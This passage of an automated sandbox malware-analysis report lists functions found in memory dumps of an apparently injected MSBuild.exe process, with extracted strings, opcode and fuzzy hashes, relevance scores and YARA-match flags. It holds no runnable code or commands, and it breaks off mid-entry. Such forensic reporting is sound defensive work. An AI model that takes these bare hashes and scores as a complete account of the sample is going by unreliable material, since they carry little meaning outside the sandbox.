API ID:
String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
API String ID: 0-4192008846
Opcode ID: fe2972621c76ace291e43f59ccc945c773f04054d4254ff69d25b818803eb834
Instruction ID: 328e6946acb9d93ac09eeac9fabd36827bfac425acca1b03657025aea3490858
Opcode Fuzzy Hash: fe2972621c76ace291e43f59ccc945c773f04054d4254ff69d25b818803eb834
Instruction Fuzzy Hash: 7B313BB1E0020DAFEB11EF95CC81AEEBBBCEF48744F144469E645E6250D774AA04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 01031270 Relevance: 3.8, Strings: 3, Instructions: 97COMMON

Download Yara Rule

Strings

BuildLabEx, xrefs: 0103130F
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 0103127B
@, xrefs: 010312A5

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction ID: 87bba456a872fa796a3f4249bcad8006cbad51b7f962867133f123a9db2b5e17
Opcode Fuzzy Hash: 4dd0507e6de23adeaafdd13239ae3a95ee5485203228978708ef77071a5cdf2e
Instruction Fuzzy Hash: 1D31917290061DAFDB12EF95CD44EEEBFBDEB98764F008425EA54A72A0D730DA058B50

Uniqueness

Uniqueness Score: -1.00%

Function 010720DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON

Download Yara Rule

Strings

Process initialization failed with status 0x%08lx, xrefs: 010720F3
LdrpInitializationFailure, xrefs: 010720FA
minkernel\ntdll\ldrinit.c, xrefs: 01072104

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: c28bcabed277c870f62cf5601ad24beefc6ae364ded2f92a23aa6b5e6ab45e12
Instruction ID: 512e05df09bc9aa571ba683a3545ccfcd6894d6ce87c43efc6e0c4228645ceeb
Opcode Fuzzy Hash: c28bcabed277c870f62cf5601ad24beefc6ae364ded2f92a23aa6b5e6ab45e12
Instruction Fuzzy Hash: F9F02834A403087BE720D60CEC12FD97BA8FB50B44F14009AF7C06B281D1B0A500D686

Uniqueness

Uniqueness Score: -1.00%

Function 010003E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 01054D8A

Strings

#%u, xrefs: 01054D82

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: b5aa475fbc253b2dfb36db63600029ad7645965a5cb19f3240abbfdd3cac247b
Instruction ID: 522f0b06ff6029b24de8d039b73c53c29694ec5e24a6ee5f853ed1f377de8035
Opcode Fuzzy Hash: b5aa475fbc253b2dfb36db63600029ad7645965a5cb19f3240abbfdd3cac247b
Instruction Fuzzy Hash: 7D717E71A0014A9FDB42DFA8C980BEEB7F8FF58344F154065E944EB291EA34ED41CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010052A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 01005445
@, xrefs: 010055A3

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 13e0462dbe281800c3c53797d809bf272811d08e4c2d21e91253be631d29cbab
Instruction ID: 9815707cbd72bd42762b6d01c0041d6d2c748d947af800ab962a56512015d7ea
Opcode Fuzzy Hash: 13e0462dbe281800c3c53797d809bf272811d08e4c2d21e91253be631d29cbab
Instruction Fuzzy Hash: 96327A705083518BE7A68F18C880B7FBBE1EF88744F54496EEAC59B290E735D984CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00FF2FC8 Relevance: 2.9, Strings: 2, Instructions: 410COMMON

Download Yara Rule

Strings

@4Cw@4Cw, xrefs: 00FF33AD, 00FF33B3, 00FF33E2
PATH, xrefs: 00FF30D6, 00FF3124

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: @4Cw@4Cw$PATH
API String ID: 0-1794901795
Opcode ID: 03b849258502c2b563d4c3e8741f415957d60a773607b134cfff7e1b7b5c641c
Instruction ID: c4e8bda8074947131af230f5a6353489f93c786a56cb21188064b09001e50045
Opcode Fuzzy Hash: 03b849258502c2b563d4c3e8741f415957d60a773607b134cfff7e1b7b5c641c
Instruction Fuzzy Hash: 94F1BE71D102199BCB25CF99D880ABEB7F5FF88710F55402AEA80AB360D7759E41EB60

Uniqueness

Uniqueness Score: -1.00%

Function 010BA352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 010BA551
`, xrefs: 010BA44B

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: 42fc5cce14dc88c1855055d5d59fb909d825ae87b2dde6d059053c20a2b52eb9
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: BFC1BE713043469BEB25CE28C881BABBBE5BFD8318F084A2DF6D68B290D775D505CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FF0CF2 Relevance: 2.8, Strings: 2, Instructions: 317COMMON

Download Yara Rule

Strings

Failed to retrieve service checksum., xrefs: 0104EE56
ResIdCount less than 2., xrefs: 0104EEC9

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Failed to retrieve service checksum.$ResIdCount less than 2.
API String ID: 0-863616075
Opcode ID: 111d578681e7a1ddedc6cc93071dbfe851042127ef4c6a972be039573e7e4244
Instruction ID: 4d6f2c3f0d94dfdea9b3c2b153e6637b405a9624a56f8ce8588eea7342c48d58
Opcode Fuzzy Hash: 111d578681e7a1ddedc6cc93071dbfe851042127ef4c6a972be039573e7e4244
Instruction Fuzzy Hash: D2E1E2B19083849FD364CF16C480BABBBE4BF88714F00892EE5D99B391DB759909CF56

Uniqueness

Uniqueness Score: -1.00%

Function 00402480 Relevance: 2.7, Strings: 2, Instructions: 175COMMON

Download Yara Rule

Strings

gfff, xrefs: 004024D9
gfff, xrefs: 00402591

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff
API String ID: 0-3084402119
Opcode ID: 51dc4602231189b18f1bcf76235b28d3249411dd8fdac1557c9cce43e2a3eb20
Instruction ID: c6a98dca906a825da15745712a5a964b8cbf204b1050fc85d5b2dad7715be8d7
Opcode Fuzzy Hash: 51dc4602231189b18f1bcf76235b28d3249411dd8fdac1557c9cce43e2a3eb20
Instruction Fuzzy Hash: 1C41F67170001607DF2C481D9EA82BA6647E7E5315F88863BE986DF3C5E8B9AD435289

Uniqueness

Uniqueness Score: -1.00%

Function 0040247E Relevance: 2.7, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

gfff, xrefs: 004024D9
gfff, xrefs: 00402591

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff
API String ID: 0-3084402119
Opcode ID: 6d99784604193e8559b7c4fc4116301fc7b43f0c5ee6a7374782ee59134d0915
Instruction ID: 6f762910212ce1fd52621d5c4a0ee982edbab8458a5886fb2a9c47a361c712a4
Opcode Fuzzy Hash: 6d99784604193e8559b7c4fc4116301fc7b43f0c5ee6a7374782ee59134d0915
Instruction Fuzzy Hash: D641E77170000607DF2C481DDEA83BA6643E7E5305F88963BE946EF3D5E8BCAD52428D

Uniqueness

Uniqueness Score: -1.00%

Function 00FF04E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON

Download Yara Rule

Strings

TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 00FF063D
kLsE, xrefs: 00FF0540

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
API String ID: 0-2547482624
Opcode ID: d3f61f4ff4314320fd93879ba89087ffe544c4e88f5cfe6be286a3d870f013a9
Instruction ID: d84e8bd88c9bb82687d4c76d44ef0a84c83d96e03143eb9f0f6b059cbaa2c3e0
Opcode Fuzzy Hash: d3f61f4ff4314320fd93879ba89087ffe544c4e88f5cfe6be286a3d870f013a9
Instruction Fuzzy Hash: 4F51BF7190474A8BC724EF64C5406B3B7E4AF88714F04483EEAD9C7262EB74E945DF92

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 2.6, Strings: 2, Instructions: 146COMMON

Download Yara Rule

Strings

yxxx, xrefs: 00401070
gfff, xrefs: 00401020

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$yxxx
API String ID: 0-1072206253
Opcode ID: 2c5273cd5afa979fefe2078420cba10113ae818e0ce15fcfd380ad0eefa2b6f7
Instruction ID: 8e5cdd321143b6cb95bc5126cfa35ebea112e9be439bc87ab81994084046c2db
Opcode Fuzzy Hash: 2c5273cd5afa979fefe2078420cba10113ae818e0ce15fcfd380ad0eefa2b6f7
Instruction Fuzzy Hash: 8C411832F0015647DB1C445E9C613AA6142D7E8354F289237EA9AEF7E1E47DED818284

Uniqueness

Uniqueness Score: -1.00%

Function 00402C90 Relevance: 2.6, Strings: 2, Instructions: 120COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402D89
gfff, xrefs: 00402D15

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff
API String ID: 0-3084402119
Opcode ID: 7d714d078735be4a7b7af6c238d6517b57d2b25da248ceb5e1cebaac0b45ba22
Instruction ID: d21528aeb5c7fa609fa8455b9b29f45d25320185135ff3bd0955faa0d0c73e2e
Opcode Fuzzy Hash: 7d714d078735be4a7b7af6c238d6517b57d2b25da248ceb5e1cebaac0b45ba22
Instruction Fuzzy Hash: 59313872B0011647DB2CC95EDE9979AB646EBE4311F1D823BED49DF3D0F9B8AD008684

Uniqueness

Uniqueness Score: -1.00%

Function 00FFA2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 00FFA309
RtlpResUltimateFallbackInfo Enter, xrefs: 00FFA2FB

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 9f7bc2dee9116f67053bf4cc3c62829b912679e779ecbe8b2b186871fb9eb5d3
Instruction ID: 25d55dd85a98c1dbc4229f813c46c190b67dd494414b1fc0c179d9890d4efc81
Opcode Fuzzy Hash: 9f7bc2dee9116f67053bf4cc3c62829b912679e779ecbe8b2b186871fb9eb5d3
Instruction Fuzzy Hash: 7941CD75A00649CBEB22DF59C840BBA77F4FF84710F2440A9EE48DB2A1E776D940DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00402C8D Relevance: 2.6, Strings: 2, Instructions: 116COMMON

Download Yara Rule

Strings

gfff, xrefs: 00402D89
gfff, xrefs: 00402D15

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: gfff$gfff
API String ID: 0-3084402119
Opcode ID: 6062d16c16576e134de58933f8967503e7045621f62417ef0bc4cbc2c5b92ee2
Instruction ID: fe18bbe10a14167ee3aa4c1872f49ac95a4dd14cc826717df870d3494d24aac7
Opcode Fuzzy Hash: 6062d16c16576e134de58933f8967503e7045621f62417ef0bc4cbc2c5b92ee2
Instruction Fuzzy Hash: AA313872B0010647DB6CC95DDE997AA7642EBE4315F1C823BED49DF3D0E9B8AD008684

Uniqueness

Uniqueness Score: -1.00%

Function 010835BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 010835EC
LdrResGetRCConfig Exit, xrefs: 010835FE

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: aac459b4554d2591fec0cad7cb8d1640425577dc946c16bfce580eb28f801090
Instruction ID: 6d475b0278cf643f44c49a5911319cb95db101409835246da507209a04ea3665
Opcode Fuzzy Hash: aac459b4554d2591fec0cad7cb8d1640425577dc946c16bfce580eb28f801090
Instruction Fuzzy Hash: 01319D312087429BE312EB2CD844B5ABBE4BFD8B58F044869A9D48B390EB34D905CB52

Uniqueness

Uniqueness Score: -1.00%

Function 0102329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 0102330D
.Local\, xrefs: 010232B5

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: be28d9e584fb0ceb28f5795c1056ba27100363b6c0acd9470d778aef60b9eefe
Instruction ID: 15d2f3f0752110100c979e2f08da4d93a9f497bde5a499f335bf08cae943c78d
Opcode Fuzzy Hash: be28d9e584fb0ceb28f5795c1056ba27100363b6c0acd9470d778aef60b9eefe
Instruction Fuzzy Hash: 6E318F72508715AFD351DF28C880A9FBBE8FB89654F40492EF9D58B250DA39DE048B92

Uniqueness

Uniqueness Score: -1.00%

Function 0102A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Cleanup Group, xrefs: 0102A5E4
Threadpool!, xrefs: 0102A5E9

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: cc6afd39bbdf29c22879c66f87ae9a6ce170acb262eacfda791fd728bd32889d
Instruction ID: a9843344fa3548d3cd074a813b56a0d4ecbe5526531fb9fafa9a451bfa003446
Opcode Fuzzy Hash: cc6afd39bbdf29c22879c66f87ae9a6ce170acb262eacfda791fd728bd32889d
Instruction Fuzzy Hash: B701D1B2250700EFD321DF14DE4AF1677E8E798B15F008979E698CB990EB35E804DB46

Uniqueness

Uniqueness Score: -1.00%

Function 00FFC7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON

Download Yara Rule

Strings

MUI, xrefs: 00FFC8C3, 00FFCA40

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: MUI
API String ID: 0-1339004836
Opcode ID: 14846abfe1460617e7c34738303d5ae697d37e652447ccfb70e3dc5d177514f3
Instruction ID: c1ba2022031d0a165b8b63d9feb72dc75f6d793730c0e4301785be29ff3e6293
Opcode Fuzzy Hash: 14846abfe1460617e7c34738303d5ae697d37e652447ccfb70e3dc5d177514f3
Instruction Fuzzy Hash: A9825C75E0022D8BDB24CFA9C9807FDB7B6BF44710F148169EA59AB3A0D7349D41EB90

Uniqueness

Uniqueness Score: -1.00%

Function 01042F28 Relevance: 2.0, Strings: 1, Instructions: 762COMMON

Download Yara Rule

Strings

P`1wRb1w, xrefs: 0104300D, 010433E4, 0104343B, 010434FE, 0104352E

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: P`1wRb1w
API String ID: 0-487437271
Opcode ID: 406c929c3ee05619769c6618463eed021afe9205df73ee7d446221e4ed2010ba
Instruction ID: 989d99d76152d99abf69df9123ed5459e214e14bcbcaad1f4263ff88454e21c7
Opcode Fuzzy Hash: 406c929c3ee05619769c6618463eed021afe9205df73ee7d446221e4ed2010ba
Instruction Fuzzy Hash: 5D42D0F1D0426AABEF69DAACD4D46FDBBF0BB04310F14A1BAE5C1AF290D6349941C750

Uniqueness

Uniqueness Score: -1.00%

Function 00FF7370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a9aaead64c5f35ca9bda9fa7123074f916cf13662e4eee4674fa38df8e7f876e
Instruction ID: abd3b635de2587518e06c63c7bd25cf22a12c1361ac47d12ad49aef76cdb50f6
Opcode Fuzzy Hash: a9aaead64c5f35ca9bda9fa7123074f916cf13662e4eee4674fa38df8e7f876e
Instruction Fuzzy Hash: AFA17E71A08346CFD321DF28D480A2BFBE5BF98714F24496DE6858B361E730E945DB92

Uniqueness

Uniqueness Score: -1.00%

Function 01012E90 Relevance: 1.7, Strings: 1, Instructions: 438COMMON

Download Yara Rule

Strings

0, xrefs: 01013240

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: bb81a126fc4df81d4d516481bc7f875c73a3bab83eb38293528d9b41b30b6e75
Instruction ID: ff21f238107da10d9e0e6a383cbad2148d2abf28d2777c2b9ff970e4bfda761e
Opcode Fuzzy Hash: bb81a126fc4df81d4d516481bc7f875c73a3bab83eb38293528d9b41b30b6e75
Instruction Fuzzy Hash: 5EF19F71604342CFD766CF28C490A6ABBE1BF88720F15486DF9C99B259CB38D945CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00416430 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0041674F

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: a09663639edf5ea3353b64ee4ddd19f79ecc88aaf2648228a768b9086da5bedc
Instruction ID: 0dc30065fc2103866632bd7656518b7754763d11aa5e53b75bd8bf80e731bf50
Opcode Fuzzy Hash: a09663639edf5ea3353b64ee4ddd19f79ecc88aaf2648228a768b9086da5bedc
Instruction Fuzzy Hash: 5F021EB6E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80

Uniqueness

Uniqueness Score: -1.00%

Function 00416433 Relevance: 1.7, Strings: 1, Instructions: 423COMMON

Download Yara Rule

Strings

(, xrefs: 0041674F

Memory Dump Source

Source File: 0000000A.00000002.2443671664.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: (
API String ID: 0-3887548279
Opcode ID: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction ID: 8f1a66099d3ad4be8ad97d5ea537e33280c6a33152691f61babd4a3ad4beba74
Opcode Fuzzy Hash: 5b5895f0e51fce406fdbb92f5fe0f57fd39733701dba8a51bdd5afbf1107f5ef
Instruction Fuzzy Hash: EB021E76E006189FDB14CF9AD4805DDFBF2FF88314F1AC1AAD859A7315D674AA418F80

Uniqueness

Uniqueness Score: -1.00%

Function 0107EFA0 Relevance: 1.6, APIs: 1, Instructions: 121COMMON

Download Yara Rule

APIs

__aullrem.LIBCMT ref: 0107F05B

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID: __aullrem
String ID:
API String ID: 3758378126-0
Opcode ID: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction ID: 21a62b2cd8b679a5fa4226cfc25e40fc4b069b03974804640e13af410373ff14
Opcode Fuzzy Hash: d2399a191eb0f5f701a36fcf9f691f845dfe918fa796f31438aa4cbd81ac600a
Instruction Fuzzy Hash: B4418E71F0011A9BDF19DFB8C8805AEF7F2FF88310B188279E665E7380D634A9508794

Uniqueness

Uniqueness Score: -1.00%

Function 00FF0100 Relevance: 1.6, Strings: 1, Instructions: 321COMMON

Download Yara Rule

Strings

, xrefs: 00FF0255

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: fb28e8a469a0701d195219ae423f79d2e071ceb0ddbb21b4f7d5f71a42fadb34
Instruction ID: 1ee53510acc79ee7f1ecdc2634d0d554b254cea327b7df429aa7ab4baa076f22
Opcode Fuzzy Hash: fb28e8a469a0701d195219ae423f79d2e071ceb0ddbb21b4f7d5f71a42fadb34
Instruction Fuzzy Hash: F8A12971E0426C6BDF24CA24CC85BFE77A56F55314F0440A9EFC6A72A3CE789D40AB60

Uniqueness

Uniqueness Score: -1.00%

Function 01076420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

Strings

, xrefs: 010765C1

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e969ff71717e7897e69f5a86a64e99d06b07a69dee113d6b877e27f8cf3b42e3
Instruction ID: 5e7b9d5d85ee496961cc7b2d2c7e7d993d3eeee87a4f83a05102ef5818bec7f1
Opcode Fuzzy Hash: e969ff71717e7897e69f5a86a64e99d06b07a69dee113d6b877e27f8cf3b42e3
Instruction Fuzzy Hash: AD919F72A00619AFEB21DF95CC85FEEBBB8EF08B50F104065F641AB190D775AD04CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 010AB256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 010AB28F

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 7989d970c509e97e72089717d8f1ec45e2b77de85f42845ea1612c1920f1fc90
Instruction ID: faa6a5baea9bf062f6877bd33afc96cd6d273b6206b0c53907be09822388cfe6
Opcode Fuzzy Hash: 7989d970c509e97e72089717d8f1ec45e2b77de85f42845ea1612c1920f1fc90
Instruction Fuzzy Hash: 5941D433D00219ABDB11DAD9CC50BEEBBB9EF44710F4581A6EE91EB250D674DE40C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 0109705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 010970A4

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: a064a8677149e15662080eb294411de067eef7de78383cd8d8682592bb6df6c3
Instruction ID: db8b8d26ec3031dfbfbdcb6b1ab30aab15c26599facdc5c151a3352122a32a7a
Opcode Fuzzy Hash: a064a8677149e15662080eb294411de067eef7de78383cd8d8682592bb6df6c3
Instruction Fuzzy Hash: F041A87251030547EB31AB6AF895BA93FD4AB50F24F140159EED08E1DAC77F0481DB90

Uniqueness

Uniqueness Score: -1.00%

Function 01027505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 01064622

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: 2d9fcec0215aaf2a7b09ae91aed776b333f1ba06a573047a170c1011868f6423
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: 95419F75A00666DBDF25DF48C490BBEB7B5EBA4701F00409AE98197240DB74DD41CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00FF5096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 00FF50BF

Memory Dump Source

Source File: 0000000A.00000002.2455604371.0000000000FC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_fc0000_MSBuild.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 499228ec3a78f7183bee99f92a864b3d52c58d20944a59ecc519493f85992422
Instruction ID: 30306c1c398e96cb0f6584fcbaca189a67c79a1844e8d64f5f69783fe9501bcb
Opcode Fuzzy Hash: 499228ec3a78f7183bee99f92a864b3d52c58d20944a59ecc519493f85992422
Instruction Fuzzy Hash: 47118431B04D1B8BD724491D885077672D5EF91B24F34452AE752DB371EE71EC41B380

Uniqueness

Uniqueness Score: -1.00%

Function 0107106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

